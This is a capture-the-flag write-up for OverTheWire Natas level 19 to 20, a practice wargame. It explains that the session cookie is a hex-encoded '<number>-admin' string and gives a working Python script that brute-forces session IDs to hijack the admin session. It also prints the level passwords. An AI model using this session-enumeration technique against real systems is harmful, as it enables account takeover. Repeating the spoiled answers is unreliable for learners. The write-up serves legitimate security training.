Natas Level 19 → Level 20

The page start with a message saying it is pretty much using the code from previous one except it is not sequential. Again, there is a username and a password field for you to login as admin and to retrieve credentials for natas20. No source code available. I entered a username: admin and password:password and intercepted the traffic using burp. Let see what the PHPSESSID looks like in the headers.

PHPSESSID=3534382d61646d696e; path=/; HttpOnly

That’s a lot of character for brute force. However, if you notice, the session id looks like hex. I quickly check what this is in ASCII.

548-admin

That seems a little too good to be true. Notice I use the user admin, so let modify our last script to enumerate 1 to 640 (hopefully $maxid is still the same), append that with “-admin”, convert the whole thing into hex string, set the PHPSESSID and see if we can get the next password.

#!/bin/python3
import requests
import binascii

def str2byte(s):
 return bytes(s, encoding='utf-8')

def byte2hex(b):
 return ''.join([hex(n)[2:].rjust(2,'0') for n in b])

def str2hex(s):
 return byte2hex(str2byte(s))

maxid = 641
user = "natas19"
passwd = "4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs" 
url = "http://"+user+".natas.labs.overthewire.org"
admin = '-admin'
match = "You are an admin. The credentials for the next level are:"

for i in range(maxid):
 c = dict(PHPSESSID=str2hex(str(i)+admin))
 h = requests.get(url, auth=(user, passwd), cookies=c)
 if match in str(h.content):
 print (h.content)
 break

We got the next password in the content again (id=501). With the id at such high number in the last level, I had a temptation to run the range reverse or use random generator to pick my id. However, in real life, unless you had a reason to suspect the id is not generated randomly, there is no penalty to start from the lowest number to highest number for the brute force attack because the average guess will be the same ($maxid/2).

eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF

In the python code, I reuse codes from set 1 of the matasano crypto challenges. There are documentation on how to convert between binary and ASCII below.

Additional resources:

Advertisements